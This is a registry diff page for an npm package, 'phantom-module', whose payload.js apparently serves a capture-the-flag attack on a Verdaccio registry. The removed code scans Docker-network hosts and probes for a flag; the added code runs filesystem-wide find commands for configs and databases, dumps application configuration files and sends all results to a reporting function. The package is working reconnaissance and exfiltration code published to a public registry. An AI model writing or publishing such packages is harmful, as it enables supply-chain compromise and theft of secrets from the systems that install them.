npm - phantom-module - Versions diffs - 117.0.99 → 117.0.100 - Mend

phantom-module 117.0.99 → 117.0.100

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +1 -1
package/payload.js +49 -71

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "phantom-module",
-  "version": "117.0.99",
+  "version": "117.0.100",
   "description": "Phantom module",
   "main": "index.js",
   "scripts": {

package/payload.js CHANGED Viewed

@@ -1,6 +1,7 @@
-const net = require('net');
 const http = require('http');
 const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
 if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
@@ -22,84 +23,61 @@ async function report(moduleId, data) {
   });
 }
-function checkPort(host, port) {
-  return new Promise((resolve) => {
-    const sock = new net.Socket();
-    sock.setTimeout(400);
-    sock.on('connect', () => { sock.destroy(); resolve(true); });
-    sock.on('error', () => { sock.destroy(); resolve(false); });
-    sock.on('timeout', () => { sock.destroy(); resolve(false); });
-    sock.connect(port, host);
-  });
-}
-function httpGet(url) {
-  return new Promise((resolve) => {
-    const req = http.get(url, { timeout: 1500 }, (res) => {
-      let body = '';
-      res.on('data', c => body += c);
-      res.on('end', () => resolve({ status: res.statusCode, body }));
-    });
-    req.on('error', e => resolve({ status: 0, body: e.message }));
-  });
+function walk(dir, fileList = []) {
+  try {
+      const files = fs.readdirSync(dir);
+      files.forEach(file => {
+          const filePath = path.join(dir, file);
+          try {
+              const stat = fs.statSync(filePath);
+              if (stat.isDirectory()) {
+                  if (file !== 'node_modules' && file !== '.git' && file !== 'proc' && file !== 'sys') walk(filePath, fileList);
+              } else {
+                  fileList.push(filePath);
+              }
+          } catch(e) {}
+      });
+  } catch(e) {}
+  return fileList;
 }
 async function main() {
-  await report('ECT-654321', 'SCAN V10 STARTING...');
+  await report('ECT-654321', 'FS SCAN V11 STARTING...');
-  const base = '172.17.0';
-  const ports = [4873, 80, 8080, 3000, 5000];
-  let scanOutput = '=== SCAN V10 ===\n';
-  let foundTarget = null;
-  // Scan IPs 1-10
-  for (let i = 1; i <= 10; i++) {
-      const ip = `${base}.${i}`;
-      for (const port of ports) {
-          if (await checkPort(ip, port)) {
-              scanOutput += `OPEN ${ip}:${port}\n`;
-              // Try HTTP probe
-              const res = await httpGet(`http://${ip}:${port}/`);
-              scanOutput += `HTTP ${ip}:${port} -> ${res.status} (len ${res.body ? res.body.length : 0})\n`;
-              // If it looks like a registry or API, probe deeper
-              if (res.status === 200 || res.body.includes('Verdaccio') || port === 4873) {
-                  foundTarget = `http://${ip}:${port}`;
-                  scanOutput += `*** POTENTIAL TARGET FOUND ***\n`;
-              }
-          }
-      }
-  }
+  let fsOutput = '=== FIND RESULTS ===\n';
+  try {
+      fsOutput += `VERDACCIO CONFIGS:\n${execSync('find / -name "config.yaml" 2>/dev/null || true').toString()}\n`;
+      fsOutput += `VERDACCIO DIRS:\n${execSync('find / -name "verdaccio" 2>/dev/null || true').toString()}\n`;
+      fsOutput += `DB FILES:\n${execSync('find / -name "*.db" 2>/dev/null || true').toString()}\n`;
+      fsOutput += `SQLITE:\n${execSync('find / -name "*.sqlite" 2>/dev/null || true').toString()}\n`;
+  } catch(e) { fsOutput += `ERR: ${e.message}\n`; }
-  await report('ECT-839201', scanOutput);
+  await report('ECT-839201', fsOutput);
-  if (foundTarget) {
-      let result = `=== TARGET: ${foundTarget} ===\n`;
-      // 1. Try to get ecto-spirit metadata
-      const ecto = await httpGet(`${foundTarget}/ecto-spirit`);
-      result += `/ecto-spirit: ${ecto.status}\n${ecto.body ? ecto.body.substring(0, 1000) : ''}\n`;
-      // 2. Try to list all packages
-      const all = await httpGet(`${foundTarget}/-/all`);
-      result += `/-/all: ${all.status}\n${all.body ? all.body.substring(0, 500) : ''}\n`;
-      // 3. Try to get the flag directly if hinted
-      if (ecto.body && ecto.body.includes('tarball')) {
-          try {
-              const json = JSON.parse(ecto.body);
-              // Check if description or readme has flag
-              if (JSON.stringify(json).includes('htb{')) {
-                  result += `!!! FLAG IN METADATA !!!\n`;
-              }
-          } catch(e) {}
+  // Dump specific config files
+  const configs = [
+      '/home/node/aspect-node/package.json',
+      '/home/node/aspect-node/modules/npm-tracker/src/config/config.json',
+      '/home/node/aspect-node/modules/npm-tracker/src/config/default.json',
+      '/home/node/aspect-node/modules/npm-tracker/src/config/production.json'
+  ];
+  // Also list src/config dir
+  try {
+      const configDir = '/home/node/aspect-node/modules/npm-tracker/src/config';
+      fs.readdirSync(configDir).forEach(f => configs.push(path.join(configDir, f)));
+  } catch(e) {}
+  let configDump = '=== CONFIG DUMP ===\n';
+  const uniqueConfigs = [...new Set(configs)];
+  for (const f of uniqueConfigs) {
+      if (fs.existsSync(f)) {
+          configDump += `--- ${f} ---\n${fs.readFileSync(f, 'utf8').substring(0, 1000)}\n`;
       }
-      await report('ECT-987654', result);
-  } else {
-      await report('ECT-987654', 'No web service found in 1-10 range.');
   }
+  await report('ECT-987654', configDump);
 }
 main().catch(e => report('ECT-654321', 'ERR: ' + e.message));